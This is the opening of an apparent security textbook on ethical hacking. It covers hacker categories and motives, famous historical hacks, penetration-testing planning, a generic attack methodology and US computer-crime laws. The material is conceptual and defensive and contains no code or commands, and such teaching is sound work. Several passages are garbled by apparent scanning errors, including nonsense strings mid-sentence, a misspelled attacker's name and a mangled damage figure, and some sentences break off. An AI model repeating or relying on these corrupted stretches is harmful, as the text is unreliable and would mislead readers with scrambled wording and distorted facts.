Thanks to Mom and Dad for all your help over the years. Thanks to Heather for all your hard work and keeping me on task. Every author should be so fortunate to have you helping them. And a very special thanks to Jennifer. Thank you for your support and encouragement, and for acting interested in the topics that this geek would yak about for too long. I’ll always appreciate and love you more than words can express. Thanks for being the Zelda to my Link.

About the Authors

SEAN-PHILIP ORIYANO has been actively working in the IT field since 1990. Throughout his career, he has held positions from support specialist to consultant and senior instructor. Currently, he is an IT instructor who specializes in infrastructure and security topics for various public and private entities. Oriyano has instructed for the U.S. Air Force, Navy, and Army at locations both in North America and internationally. Sean is certified as a CISSP, CHFI, CEH, CEI, CNDA, SCNP, SCPI, MCT, MCSE, and MCITP, and he is a member of the EC-Council, ISSA,
the eLearning Guild, and Infragard.

MICHAEL GREGG brings more than 20 years of experience building real security solutions and driving strategic development. He is a cybersecurity expert focused on IT networks and security assessments. His written works in the field of IT security include authoring or coauthoring 14 security books. Some of these titles include: Hack the Stack (Syngress); Security Street Smarts (Sybex); CISSP Exam Cram 2, CISSP Exam Cram 2 Questions Edition, and The Certified Ethical Hacker Exam Prep 2 (Que). He also authored Inside Network Security Assessment (Sams Publishing), Build Your Own Network Security Lab (Wiley), and The Certified Information Security Auditor (CISA) Exam Prep (Que). Gregg holds two associate’s degrees, a bachelor’s degree, and a master’s degree.

PART ONE – Hacker Techniques and Tools

Chapter 1 Hacking: The Next Generation; Chapter 2 TCP/IP Review; Chapter 3 Cryptographic Concepts; Chapter 4 Physical Security

CHAPTER 1 – Hacking: The Next Generation

THIS BOOK WILL COVER A WIDE RANGE of techniques and technologies that hackers can use to compromise a system in one way or another. Before you go further, it is important to first understand what hackers are and where they come from. The first generation of hackers who emerged in the 1960s were individuals who would be called “geeks” or technology enthusiasts today. These early hackers would go on to create the foundation for technologies such as the ARPANET, which paved the way for the Internet. They also initiated many early software-development movements that led to what is known today as open source. Hacking was motivated by intellectual curiosity; causing damage or stealing information was “against the rules” for this small number of people. In the 1980s, hackers started gaining more of the negative connotations by which the public now identifies them.
Movies such as War Games and media attention started altering the image of a hacker from a technology enthusiast to a computer criminal. During this time period, hackers engaged in activities such as theft of service by breaking into phone systems to make free phone calls. The publishing of books such as The Cuckoo’s Egg and the emergence of magazines such as Phrack cast even more negative light on hackers. In many respects, the 1980s formed the basis for what a hacker is today.

Over the past two decades, the definition of what a hacker is has evolved dramatically from what was accepted in the 1980s and even the 1990s. Current hackers defy easy classification and require categorization into several groups to better match their respective goals. Here is a brief look at each of the groups to better understand what the information technology industry is dealing with:

• Script kiddies – These hackers occupy the lowest level of the hacker hierarchy. They typically possess very basic skills and rely upon existing tools that they can locate on the Internet. These hackers are the beginners and may or may not understand the impact of their actions in the larger scheme of things. It is important, however, not to underestimate the damage these individuals can cause; they can still do a great deal of harm.

• White-hat hackers – These individuals know how hacking works and the danger it poses, but use their skills for good. They adhere to an ethic of “do no harm.” White-hat hackers are sometimes also referred to as ethical hackers, which is the name most widely known by the general public.

• Gray-hat hackers – Hackers in this class are “rehabilitated” hackers or those who once were on “the dark side,” but are now reformed.
For obvious reasons, not all people will trust a gray-hat hacker Black-hat hackers — A black-hat hacker has, through actions or stated intent, indicated that his or her hacking is designed to break the law r disrupt systems or businesses, or generate an illegal financial return. Hackers in this class should be considered to be “up to no good/’ as the saying goes. They may have an agenda or no agenda at alL In most cases, black-hat hackers and outright criminal activity are not too far removed from one another The purpose of this book is to teach you how to ensure the security of computers and networks by learning and understanding the mindset of individuals out to compromise those systems. To defend information technology assets, you need to understand the motivations, tools, and techniques that attackers commonly use, Chapter 1 Topics This chapter covers the following topics and concepts: What the profiles of hackers, crackers, and cybef criminals are • What a look back at the history of computer hacking shows • What ethical hacking and penetration testing are What common hacking methodologies are ■ How to perform a penetration test • What the roles of ethical standards and the law are 3 Chapter 1 Goals When you complete this chapter, you will be able to: • Describe the history of hacking • Explain the evolution of hacking • Explain why information systems and people are vulnerable to manipulation • Differentiate between hacking, ethical hacking, penetration testing, and auditing • Relate the motivations, skill sets, and primary attack tools used by hackers • Compare the steps and phases of a hacking attack to those of a penetration test • Explain the difference in risk between inside and outside threats and attacks • Review the need for ethical hackers • State the most important step in ethical hacking • Identify important laws that relate to hacking Profiles of Hackers, Crackers, and Cybercriminals In today’s world, organizations have quickly Learned that they 
can no Longer afford to muleiTsljmatL? or ignore the Eh rem al NiduTH pose. Origan mi Lams of till sizes hiwc Jeanied to reduce threats through a combination of technological, ad in in is t rati ve h and physical measures designed to address a specific range of problems. Technological measures include devices and techniques such as virtual private networks l VPN si. cryptographic protocols, intrusion detection systems (IDS), intrusion prevention systems (IPS), access control lists ( ACLs), biometrics, smart cards, and other devices. Administrative controls include H ™ U People who break the law or break into systems without authorization are more correctly known as “crackers.'” The press does not usually make this distinction, because- “hacker” has become such a universal term. However, there are many experienced hackers who never break the law r and who define hacking as producing an outcome the system designer never anticipated. In that respect, Albert Einstein can be considered to have “hacked” Newtonian physics. In the interest of simplicity this book will use the term “hacker” to describe those who are either good or evil. No offense is intended to either group. CHAPTER 1 Hacking: The Next Generation 5 pi. iJ ides, procedures, and olber rules. Physical measures include devices such as cable locks, dei r ice locks, alarm systems, and other similar devices. Keep in mind that each of these devices, even if expensive, can be cheaper and more effective than cleaning up the aftermath of an intrusion. While discussing attacks and attackers, security professionals must be thorough in assessment and evaluation of the threat by also considering where it comes from. When evaluating the threats against an organization and possible sources of attack, always consider the fact that attackers can come from both outside and inside the organization. A single disgruntled employee can cause tremendous amounts of damage because he or she is an approved user of the system. 
In just about any given situalion, Lhe attacks originating fro in fiutsuii 1 the firewall will greatly outnumber the attacks that originate from the inside. However, an insider may go unnoticed longer and also have some level of knowledge of how things work ahead of time, which can result in a more effective attack. Because the risk to any organization is very real, it is up to each organization to determine the controls that will be most effective in reducing or mitigating the threats it faces. When considering controls, you can examine something called the TAP principle of controls, TAP is an acronym for technical, adminis- trative, and physical!, the three types of controls you can use in risk mitigation. Here’s a look at each type with a few examples: • Technical — Technical controls take the form of software or hardware such as iire walls, proxies, intrusion detection systems (IDS), intrusion prevention systems (IPS), biomclrie authentication, permissions, auditing, and sim ilar technologies. • Administrative — Administrative controls take the form of policies and procedures. An example is a password policy that defines what makes a good password. In numerous cases, administrative controls may also fulfill legal requirements, such as policies that dictate privacy of customer information. Other examples of administrative policy include the rules governing the hiring and firing of employees. • Physical — Physical controls are those that protect assets from traditional threats such as theft or vandalism. Mechanisms in this category include locks, cameras, guards, lighting, fences, gates, and other similar devices, • NOTE Never underestimate the damage a determined individual can do to computer systems, For example, Michael Cake,, commonly known as MafiaBoy, was an individual who In February 2000 launched a series of denial of service (Do 5) attacks that were responsible for causing damages estimated upwards of$1 .2 bit! ion.

NOTE

Both insiders and outsiders rely on exploits of some type. Remember that an exploit refers to a piece of software, a tool, or a technique that targets or takes … loss of integrity, or denial of service on a computer system.


The Hacker Mindset

Like many criminals, black-hat hackers do not consider their activities to be illegal or even morally wrong. Depending on whom you ask, you can get a wide range of responses from hackers on how they view their actions. It is also not unheard of for hackers or criminals to have a code of ethics that they hold sacred, but that seems more than a little skewed to others. In defense of their actions, hackers have been known to cite all sorts of reasons, including the following:

• The no-harm-was-done fallacy — If one enters a system, even in an unauthorized manner, it is OK as long as nothing is stolen or damaged in the process.

• The computer game fallacy — If the computer or system did not take any action or have any mechanism to stop the attack, it must be OK.

• The law-abiding citizen fallacy — Writing a virus is not illegal, so it must be OK.

• The shatterproof fallacy — Computers cannot do any real harm. The worst that can happen is a deleted file or erased program.

• The candy-from-a-baby fallacy — If it is so easy to copy …

• The hacker fallacy — Information should be free. No one should have to pay for books or media. Everyone should have free access.

NOTE

Although it is true that the mere act of writing a computer virus is not illegal, releasing it into the "wild" is illegal.

NOTE

Although it is true that applications or data can be erased or modified, worse scenarios can happen under the right circumstances. For example, consider what could happen if someone broke into a system such as a 911 emergency service and then maliciously or accidentally took it down.

Another example of attempting to explain the ethics applied to hackers is known as the hacker ethic. This set of standards dates to the hackers of the 1960s; Steven Levy, in his book Hackers: Heroes of the Computer Revolution, stated it as follows:

• … the way the world works should be unlimited and total.

• All information should be free.

• Authority should be mistrusted, and decentralization should be promoted.

• Hackers should be judged by their hacking, not criteria such as degrees, age, race, gender, or position.

• You can create art and beauty on a computer.

• Computers can change your life for the better.

Ethics are an important component in understanding what makes a hacker, but far from the only component. One must also consider motivation. Anyone who has watched a police drama or is a fan of detective stories knows that there are three things needed to commit a crime:

• Means — Does the attacker possess the ability to commit the crime in question?

• Motive — Does the attacker have a reason to engage in the commission of the crime?

• Opportunity — Does the attacker have the necessary access and time to commit the crime?

Focusing on the second point, motive, helps to better understand why an attacker might engage in hacking activities. The early "pioneers" of hacking engaged in those activities out of curiosity. Today's hackers can have any number of motives, many of which are similar to those for traditional crimes:

• Monetary — Attacks committed with the intention of reaping financial gains.

• Status — Attacks committed with the intention of gaining recognition and, by extension, increased credibility within a given group (for example, a hacking group).

• Terrorism — Attacks designed to scare, intimidate, or otherwise cause panic in the victim or target group.

• Revenge or grudge — Attacks conceived and carried out by individuals who are angry at an organization. Attacks of this nature are often launched by disgruntled employees or customers.

• Hacktivism — Attacks that are carried out to bring attention to a cause, group, or political ideology.

• Fun — Attacks that are launched with no specific goal in mind other than to just carry out an attack. These attacks can be indiscriminate in their execution.

No matter what the hackers' motivations are, any of them might result in the commission of a computer-based crime. For example, attackers may hack a game server to boost their stats in an online game against their friends, but they still have entered a server without authorization.

Hacktivism

A relatively new form of hacking is the idea of hacking on behalf of a cause. In the past, hacking was done for a range of different reasons that rarely included social expression. Over the past decade, however, there have been an increasing number of security incidents with roots in social or political activism. Examples include defacing Web sites of public officials, candidates, or agencies that an individual or group disagrees with, or performing DoS attacks against corporate Web sites.


A sampling of common attacks that fit the definition of computer crime include the following:

• Theft of access — Stealing passwords, stealing usernames, and subverting access mechanisms to bypass normal authentication. In a number of situations, the very act of possessing stolen credentials such as passwords may be enough to bring formal charges.

• Network intrusions — Accessing a system or computers without authorization. Intrusions may not even involve hacking tools; the very act of logging into a guest account may be sufficient to be considered an intrusion.

• Emanation eavesdropping — Sniffing devices for intercepting radio frequency (RF) signals generated by computers or terminals. Years ago, the U.S. Department of Defense established a classified program codenamed TEMPEST that was designed to shield or suppress electronic emanations to protect sensitive and classified government information.

• Social engineering — Basically, telling lies to manipulate people into divulging information they otherwise would not provide. Information such as passwords, PINs (personal identification numbers), or other details can be used to attack computer-based systems. Although not necessarily a crime in every specific situation, social engineering methods such as pretexting (tricking an individual into revealing information under false pretenses) are often illegal.

• Posting and/or transmitting illegal material — Distributing pornography to minors is illegal in numerous jurisdictions, as is possessing or distributing child pornography.

• Fraud — Intentional deception designed to produce illegal financial gain or to damage another party.

• Software piracy — The possession, duplication, or distribution of software in violation of a license agreement, or the act of removing copy protection.

• Dumpster diving — Gathering material that has been discarded or left in unsecured or unguarded receptacles. Dumpster diving often enables discarded data to be pieced together to reconstruct sensitive information.

• Malicious code — Software written with a deliberate purpose to cause damage, destruction, or disruption. Examples include viruses, worms, spyware, and Trojan horses.

• Denial of service (DoS) and distributed denial of service (DDoS) attacks — Both DoS and DDoS have the same effect, except that distributed denial of service (DDoS) is launched from large numbers of hosts that have been compromised and act after receiving a particular command.

• … traffic or a message to disguise the true location of the message or person. This attack method may also be used as a component of other larger attacks such as DoS or DDoS attacks.

• Unauthorized destruction or alteration of information — Modifying, destroying, or tampering with information without appropriate permission. This can involve manual or automated tools that have been developed for this purpose to change information at rest or in motion.

• Embezzlement — A form of financial fraud that involves theft or redirection of funds as a result of violating a position of trust.

• Data-diddling — The unauthorized modification of data used to forge or counterfeit information. Examples include changing performance review marks, adjusting expense account limits, or "tweaking" reports after the fact.

• Logic bomb — A piece of code designed to cause harm, a logic bomb is intentionally inserted into a software system and will activate upon the occurrence of some predetermined date, time, or event.

A Look Back at the History of Computer Hacking

Typical early hackers were technology enthusiasts who were curious about the new technology of networks and computers and wanted to see just how far they could push its capabilities. In the decades since, hacking has changed quite a bit, getting more advanced and cleverer as the technology advanced. For example, in the 1970s, when mainframes were more common in corporate and university environments, hacking was mostly confined to those systems. The 1980s saw the emergence of personal computers (PCs), which meant every user had a copy of an operating system. As these systems were very similar, a hack that worked on one machine would work on nearly every other PC as well. Although the first Internet worm in November 1988 exploited a weakness in the UNIX sendmail command, worm and virus writers moved their attention to the world of PCs, where most infections occur today.

As hackers evolved so did their attacks, as their skills and creativity increased. The first World Wide Web browser, Mosaic, was introduced in 1993. By 1995, hackers began defacing Web sites. Some of the earliest hacks were quite funny, if not somewhat offensive or vulgar. In August 1995, hackers hacked the MGM Web site for the movie "Hackers," suggesting readers attend the DEFCON hacker conference instead. A 1996 hack of the Department of Justice Web site replaced Attorney General Janet Reno's picture with that of Adolf Hitler. The next month, hackers defaced the CIA Web site, and later that year the Air Force Web site featured a link to Area 51, a secret government site in Nevada, long linked in the popular mind to UFOs. By May 2001, Web sites were being hacked at such a rate that the group that documented them gave up trying to keep track (see http://attrition.org/mirror/attrition/).

By the turn of the century, hacks started to progress from pranks to maliciousness. DoS attacks took out companies' Internet access, affecting stock prices and causing financial damage. As Web sites began to process more credit card transactions, their back-end databases became prime targets for attacks. As computer-crime laws came into being, the bragging rights for hacking a Web site became less attractive: sure, a hacker could show off to friends, but that didn't produce a financial return.

With online commerce, skills started going to the highest bidder, with crime rings, organized crime, and nations with hostile interests utilizing the Internet as an attack route.

Numerous products emerged in the 1990s and early 2000s (antivirus, firewalls, intrusion detection systems, and remote access controls), each designed to counter an increasing number of new and diverse threats.

As technology, hackers, and countermeasures improved and evolved, so did the types of attacks and strategies that initially spawned them. As is true in the security field and the technology field as a whole, new developments move rapidly, and old defensive measures lose their effectiveness as time marches on. Attackers started introducing new threats in the form of worms, spam, spyware, adware, and rootkits. These attacks went beyond harassing and irritating the public: they also caused widespread disruptions by attacking the technologies that society increasingly depended on.

Hackers also started to realize that it was possible to use their skills to generate money in all sorts of interesting ways. For example, attackers have used techniques to redirect Web browsers to specific pages that generate revenue for themselves. Another example is a spammer sending out thousands upon thousands of e-mail messages that advertise a product or service. Because sending out bulk e-mail costs mere pennies, it takes only a small number of purchasers to make a nice profit.

Keep in mind that in the security field, there is an ongoing battle between attacker and defender to establish dominance. Attackers change their tactics in an effort to keep their attacks as fresh and effective as possible, while defenders improve and adapt their defenses to counter the attacks as well as anticipate new ones.

Over the past few years, the hacking community has adopted a new team ethic or work style. In the past, it was normal for a "lone wolf" type to engage in hacking activities. Over the last few years, there is a new pattern of collective or group effort. Attackers have found that working together can provide greater results than one individual carrying out an attack alone. Such teams increase their effectiveness not only by sheer numbers, diversity, or complementary skills, but also by adding clear leadership structures. Also of concern is the very real possibility that a given group of hackers may be receiving financing from nefarious sources such as criminal organizations or terrorists. The proliferation of technology and increasing dependence on it has proved an irresistible target for criminals.

Security and technology professionals are on the front lines and as such must be
aware of and deal with increasingly complex crimes. One of the biggest challenges
security professionals face is staying current on the latest technologies, trends, and threats
that appear in an ever-changing landscape. To be effective, security professionals must
continually expand their understanding of many diverse but related areas such as ethical
hacking, ethics, legal issues, cybercrime, forensic techniques, incident response, and
other technologies.

Additionally, security professionals must strive to understand the reasons and motivations behind the hacker or criminal mindset. Understanding the motivations can, in some cases, yield valuable insight into why a given attack has been committed or may be committed.

NOTE

In 1965, Gordon Moore, who went on to cofound Intel, noted that the number of transistors on an integrated circuit was doubling every 18 to 24 months. Since computing power is closely tied to transistor density, the statement "computing power doubles every 18 months" became known as Moore's Law. Cybersecurity author and expert G. Mark Hardy has offered for security professionals a corollary known as G. Mark's Law: "Half of what you know about security will be obsolete in 18 months." Successful security professionals commit to lifelong learning.

As stated earlier, hacking is by no means a new phenomenon; instead it has existed in one form or another since the 1960s. It is only for a portion of the time since then that hacking has been viewed as a crime and a situation that must be addressed.

Here’s a look at some famous hacks over time:

• In 1988, Cornell University student Robert T. Morris Jr. created what is considered to be the first Internet worm. According to Morris, his worm was designed to count the number of systems connected to the Internet. Due to a design flaw, the worm replicated quickly and indiscriminately, causing widespread slowdowns across the globe. Morris was eventually convicted under the 1986 Computer Fraud and Abuse Act and was sentenced to community service in lieu of any jail time. (Interestingly, his father, Robert Morris Sr., was the chief scientist of the National Security Agency at the time.)

• In March 1999, David L. Smith released the Melissa virus, which was designed to e-mail itself to entries in a user's address book and later delete files on the infected system. Smith was convicted on charges of computer fraud and theft of services, and served 20 months in prison as well as being ordered to pay $5,000 in fines and penalties for the damages he caused.

• In February 2001, Jan de Wit authored the Anna Kournikova virus, which was designed to read all the entries of a user's Outlook address book and e-mail itself out to each. De Wit was ultimately sentenced to 150 hours of community service, with 75 days in jail as the alternative.

• In 2003, Adam Botbyl and two friends conspired to steal credit card information from the Lowe's hardware chain. The three were charged with several counts of theft and fraud, and two of them were sentenced to prison in December 2004.

• In 2005, Cameron Lacroix (nickname "cam0") hacked into the phone of celebrity Paris Hilton and also participated in an attack against the site of LexisNexis, an online public record aggregator, ultimately exposing thousands of personal records. Lacroix was charged with computer fraud and in September 2005 was sentenced to 11 months in a juvenile detention facility as a result of his actions.

NOTE

People have written worms and viruses over the years for any number of reasons. Some reasons for creating malicious code have included curiosity, monetary gain, ego, thrill seeking, desire for fame, and revenge; and in a handful of cases to impress, or get revenge against, a former lover.

The previous examples represent some of the higher-profile incidents that have occurred, but for every news item or story that makes it into the public consciousness, many more never do. For every hacking incident that is made public, only a small portion of perpetrators are caught, and an even smaller number ever get prosecuted for cybercrime. In any case, hacking is indeed a crime, and engaging in such activities can be prosecuted under any number of laws. The volume, frequency, and seriousness of attacks have only increased and will continue to do so as technology evolves even more.
Ethical Hacking and Penetration Testing

As a security professional, two of the terms you will encounter early on are ethical hacker and penetration testing. Today's security community includes different schools of thought on what constitutes each. It's important to separate and clarify these two terms to understand each and where they fit into the big picture. Engaging in any hacking activity without the explicit permission of the owner of the target you are attacking is a crime, whether you get caught or not. From everything discussed so far, you might think that hacking is not something you can engage in legally or for any benign reason whatsoever, but this is far from the truth. It is possible to engage in hacking for good reasons (for example, when a network owner contracts with a security professional to hack systems to uncover vulnerabilities that should be addressed). Notice the important phrases "network owner contracts" and "explicit permission": Ethical hackers engage in their activities only with the permission of the asset owner. Once ethical hackers have the necessary permissions and contracts in place, they can engage in penetration testing, which is the structured and methodical means of investigating, uncovering, attacking, and reporting on a target system's strengths and vulnerabilities. Under the right circumstances, penetration testing can provide a wealth of information that the system owner can use to adjust defenses. Penetration testing can take the form of black-box or white-box testing, depending on what is being evaluated and what the organization's goals are. Black-box testing is most often used when an organization wants to closely simulate how an attacker views a system, so no knowledge of the system is provided to the testing team. In white-box testing, advance knowledge is provided to the testing team. In either case, an attack is simulated to determine what would happen to an organization if an actual attack had occurred.

NOTE

In today's environment, those wishing to become ethical hackers have many options that were unavailable before. They can pursue certification classes and participate in boot camps as part of a diverse development course to hone their skills. Always remember that the main characteristic that separates black hats from white hats is compliance with the law.

Penetration tests are also commonly used as part of a larger effort commonly known as an IT audit, which evaluates the overall effectiveness of the IT system controls that safeguard the organization. An IT audit is usually conducted against some standard or checklist that covers security protocols, software development, administrative policies, and IT governance. However, passing an IT audit does not mean that the system is completely secure, as audit checklists often trail new attack methods by months or years.

The Role of Ethical Hacking

An ethical hacker's role is to take the skills he or she has acquired and use that knowledge, together with an understanding of the hacker mindset, to simulate a hostile attacker. It is often said that to properly and completely defend oneself against an aggressor, you must understand how that aggressor thinks, acts, and reacts. The idea is similar to military training exercises in which elite units are trained in the tactics of a hostile nation in order to give other units the ability to train and understand the enemy without risking lives. Here are a few key points about ethical hacking that are important to the process:

• It requires the explicit permission of the "victim" before any activity can take place.
• Participants use the same tactics and strategies as regular hackers.
• It can harm a system if you don't exercise proper care.
• It requires detailed advance knowledge of the actual techniques a regular hacker will use.
• It requires that rules of engagement or guidelines be established prior to any testing.
NOTE

Ethical hackers can be employed to test a specific feature of a group of systems, or even the security of a whole organization. It depends on the specific needs of a given organization. In fact, some organizations keep people on staff specifically to engage in ethical hacking activities.

Under the right circumstances and with proper planning and goals, ethical hacking or penetration testing can provide a wealth of valuable information to the target organization ("client") about security issues that need addressing. The client should take these results, prioritize them, and take appropriate action to improve security. Effective security must still allow the system to provide the functionality and features needed for business to continue. However, a client may choose not to take action for a variety of reasons. In some cases, problems uncovered may be considered minor or low risk and left as is. If the problems uncovered require action, the challenge is to ensure that if security controls are modified or new ones put in place, existing usability is not decreased. Security and convenience are often in conflict with one another: the more secure a system becomes, the less convenient it tends to be (Figure 1-1). A great example of this concept is to look at authentication mechanisms. As a system moves from passwords to smart cards to biometrics, it becomes more secure, but at the same time users may have to take longer to authenticate, which may cause some disgruntlement.

FIGURE 1-1 Usability versus security.

From the theoretical side, ethical hackers are tasked with evaluating the overall state of something known as the C-I-A triad, which represents one of the core principles of security: to preserve confidentiality, integrity, and availability.

• Confidentiality — Safeguarding information or services against disclosure to unauthorized parties.

• Integrity — Ensuring that information is in its intended format or state; in other words, ensuring that data is not altered.

• Availability — Ensuring that information or a service can be accessed or used whenever requested.

Some professionals refer to this as the A-I-C triad. Another way of looking at the balance is to observe the other side of the triad and how the balance is lost. The C-I-A triad is lost if any or all of the following occurs:

• Disclosure — Information is accessed in some manner by an unauthorized party.

• Alteration — Information is maliciously or accidentally modified in some manner.

• Disruption — Information and/or services are not accessible or usable when called upon.

An ethical hacker is tasked with ensuring that the C-I-A triad is preserved and threats are dealt with adequately (as required by the organization's own rules). For example, consider what could result if a health-care organization lost control of (or could not provide access to) sensitive information about patients. Such situations typically result in civil and criminal actions. Figure 1-2 shows the C-I-A triad.

It is important to identify assets, risks, vulnerabilities, and threats. In the ethical hacking and security process, not all assets are created equal and do not have equal value for an organization. By definition, assets possess some value to a given organization. Asset owners evaluate each asset to determine how important it is relative to other assets and to the company as a whole. Next, the ethical hacker identifies potential threats and determines the capability of each to cause harm to the assets in question. Once assets and potential threats are identified, the ethical hacker thoroughly and objectively evaluates and documents each asset's vulnerabilities in order to understand potential weaknesses.
Note that a vulnerability exists only It a particular threat can adversely affect an asset Finally, the ethical hacker performs a risk determination for each asset individually and overall to determine the probtibility that a security incident could occur, given the threats and vulnerabilities in question. In a sense, risk is comparable to an individual’s “pain threshold” — different individuals can tolerate different levels of pain. Risk is the same — each organization has its own tolerance of risk, even if the threats and vulnerabilities are the same. A hacking methodology refers to the step-by-step approach an aggressor uses to attack a target such as ei computer netw T ork. There is no one specific step-by-step approach all hackers use. As can be expected when a group operates outside the rules as hackers do, rules do not apply the same way, A major difference between a hacker and an ethical hacker is the code of ethics to which each subscribes. Hacking methodology generally includes the following steps (Figure 1-3): ■ Foot printing — An attEicker passively acquires information about the intended victim’s systems. In this context, passive Information gathering means that no active interaction occurs between the attEicker and the victim (for example, conducting a whois query,) Common Hacking Methodologies The C-l-A triad. Availability 16 PART 1 Hacker Techniques and Tools FIGURE 1-3 hacking steps. Footprint] ng Scanning Enumeration System Hacking Escalation of Privilege Covering Tracks Planting Backdoors “i • Scan ni n g — A n a I t a cker t a kes the in It ) r m a lion o bta i n t? d during t h e foo I pr in I i n g p h a s l 1 and uses it to actively acquire more detailed information about a victim . For example, an attacker might conduct a ping sweep of all the victim’s known IP addresses to see which machines respond, Enumeration — An attacker extracts more-detailed and useful information from a victim’s system. 
Results of this step can include a list of user names, groups, applications, banner settings, auditing information, and other similar information.
• System hacking — An attacker actively attacks a system using a method the attacker deems useful.
• Escalation of privilege — If this step is successful, an attacker obtains privileges on a given system higher than should be permissible. Under the right conditions, an attacker can use privilege escalation to move from a low-level account such as a guest account all the way up to administrator or system-level access.
• Covering tracks — In most cases, an attacker tries to avoid detection, and so will cover his or her tracks by purging information from the system to destroy evidence of a crime.
• Planting backdoors — Depending on goals, an attacker may leave behind a backdoor on the system for later use. Backdoors can be used to regain access, as well as allow any number of different scenarios to take place, such as privilege escalations or remotely controlling a system.

## Performing a Penetration Test

A penetration test is the next logical step beyond ethical hacking. Although ethical hacking sometimes occurs without formal rules of engagement, penetration testing does require rules to be agreed upon in advance. If an ethical hacker chooses to perform a penetration test without having certain parameters determined ahead of time, it can lead to a wide range of unpleasant outcomes. For example, not having the rules established prior to engaging in a test could result in criminal or civil charges, depending on the injured party and the attack involved. It is also entirely possible that without clearly defined rules, an attack may result in shutting down systems or services and completely stopping a company's operations.
National Institute of Standards and Technology Publication 800-42 (NIST 800-42), Guideline on Network Security Testing, describes penetration testing as a four-step process, as shown in Figure 1-4. When the organization decides to carry out a penetration test, the ethical hacker should pose certain questions to establish goals. During this phase, the aim should be to clearly determine why a penetration test and its associated tasks are necessary. These questions include the following:

• Why is a penetration test deemed necessary?
• What is the function or mission of the organization to be tested?
• What will be the limits or rules of engagement for the test?
• What data and services will the test include?
• Who is the data owner?
• What results are expected at the conclusion of the test?
• What will be done with the results when presented?
• What is the budget?
• What are the expected costs?
• What resources will be made available?
• What actions will be allowed as part of the test?
• When will the tests be performed?
• Will insiders be notified?
• Will the test be performed as black or white box?
• What conditions will determine the test's success?
• Who will be the emergency contacts?

FIGURE 1-4 Ethical hacking steps: Planning, Discovery, Attack (with Additional Discovery), Reporting.

Penetration testing can take several forms. The ethical hacker must decide, along with the client, which tests are appropriate and will yield the results the clients seek. Tests that can be part of a penetration test include the following:

• Insider attack — This is designed to simulate the actions that a disgruntled employee or other individuals who have authorized access to a system may undertake.
• Outsider attack — This is designed to closely match an outside aggressor's attack against an organization.
• Stolen equipment attack — This is designed to attack an organization's physical security.
Actions of this type include breaking into server rooms, bypassing locks, and other similar activities.
• Social engineering attack — In this type of attack, the target is the human being, not the technology itself. If skillfully done, the attacker can obtain information or access that the attacker would not otherwise have. The attack exploits the inherent trust and habit in human nature.

Once the organization and the ethical hacker have discussed each test, determined its suitability, and evaluated its potential advantages and side effects, they can finalize the planning and contracts and perform the testing (Figure 1-5). When performing a penetration test, the team should generally include members with different but complementary skills. When the rules of the test have been determined, the team is selected based on the intended tests it will perform and the goals it will address. Expect a team to include diverse skill sets, including detailed knowledge of routers and routing protocols. Additional skills that prove useful are those that deal with the operation and configuration of firewalls and the operation of IDS and IPS systems. Team members should also share some skills, such as knowledge of networking, Transmission Control Protocol/Internet Protocol (TCP/IP), and similar technologies.

FIGURE 1-5 Ethical hacking test steps: Assessment, Post Assessment, Reassessment.

NOTE: When employees are not provided information about a pending or an in-progress test, they are more likely to respond as if a real attack were occurring. This is an excellent way to check if training results in changed behavior. For example, if employees do not challenge strangers conducting a penetration test, they are unlikely to challenge a real intruder.

Another important aspect of the test is whether employees will have any knowledge that the test is being performed.
In some cases, having employees unaware of the test will yield valuable insight into how they respond to incident(s). This allows for evaluation of current training. Frameworks for the penetration test may include NIST 800-42 and 800-53, the Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE), or the Open Source Security Testing Methodology Manual (OSSTMM). The OSSTMM is very popular because it is an open source, peer-reviewed methodology for performing security tests and metrics.

NOTE: NIST Special Publication (SP) 800-53A, Guide for Assessing Security Controls in Federal Information Systems and Organizations, specifically requires penetration testing and requires that ethical hackers exploit vulnerabilities and demonstrate the effectiveness of in-place security controls.

## The Role of the Law and Ethical Standards

When an ethical hacker engages in any hacking-related activity, it is absolutely essential that he or she know all applicable laws or seek assistance to determine what the laws may be. Never forget that due to the nature of the Internet and computer crime, it is entirely possible for any given crime to stretch over several jurisdictions, potentially frustrating any attempts to prosecute it. Additionally, prosecution can be stymied by the legal systems in different countries in which a mix of religious, military, criminal, and civil laws exist. Successful prosecution requires knowledge of the legal system in question.

Ethical hackers should exercise proper care not to violate the rules of engagement, because doing so can have repercussions. Once a client has determined what the goals and limitations of a test will be and contracted with the ethical hacker, the ethical hacker must carefully adhere to the guidelines. Remember two very important points when considering breaking guidelines:

• Trust — The client is placing trust in the ethical hacker to use the proper discretion when performing a test.
If an ethical hacker breaks this trust, it can lead to the questioning of other details, such as the results of the test.
• Legal implications — Breaking a limit placed upon a test may be sufficient cause for a client to take legal action against the ethical hacker.

The following is a summary of laws, regulations, and directives that an ethical hacker should have a basic knowledge of:

• 1973 U.S. Code of Fair Information Practices governs the maintenance and storage of personal information by data systems such as health and credit bureaus.
• 1974 U.S. Privacy Act governs the handling of personal information by the U.S. government.
• 1984 U.S. Medical Computer Crime Act addresses illegally accessing or altering medication data.
• 1986 (amended in 1996) U.S. Computer Fraud and Abuse Act includes issues such as altering, damaging, or destroying information in a federal computer and trafficking in computer passwords if it affects interstate or foreign commerce or permits unauthorized access to government computers.
• 1986 U.S. Electronic Communications Privacy Act prohibits eavesdropping or the interception of message contents without distinguishing between private or public systems.
• 1994 U.S. Communications Assistance for Law Enforcement Act requires all communications carriers to make wiretaps possible.
• 1996 U.S. Kennedy-Kassebaum Health Insurance Portability and Accountability Act (HIPAA) (with additional requirements added in December of 2000) addresses the issues of personal health care information privacy and health-plan portability in the United States.
• 1996 U.S. National Information Infrastructure Protection Act — enacted in October of 1996 as part of Public Law 104-294 — amended the Computer Fraud and Abuse Act, which is codified in 18 U.S.C. § 1030. This act addresses the protection of the confidentiality, integrity, and availability of data and systems.
This act is intended to encourage other countries to adopt a similar framework, thus creating a more uniform approach to addressing computer crime in the existing global information infrastructure.
• 2002 Sarbanes-Oxley Act (SOX) is a corporate governance law that affects public corporations' financial reporting. Under SOX, corporations must certify the accuracy and integrity of their financial reporting and accounting.
• 2002 Federal Information Security Management Act (FISMA) requires every U.S. federal agency to create and implement an information security program to protect the information and information systems that agency uses. This act also requires agencies to conduct annual reviews of their information security program and submit results to the Office of Management and Budget (OMB).

## CHAPTER SUMMARY

